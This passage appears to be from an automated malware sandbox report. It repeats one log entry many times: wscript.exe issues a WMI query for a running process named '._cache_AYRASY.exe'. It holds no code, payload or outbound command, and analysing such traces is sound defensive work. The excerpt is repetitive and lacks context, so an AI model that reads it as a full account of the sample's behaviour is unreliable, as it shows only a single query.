                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
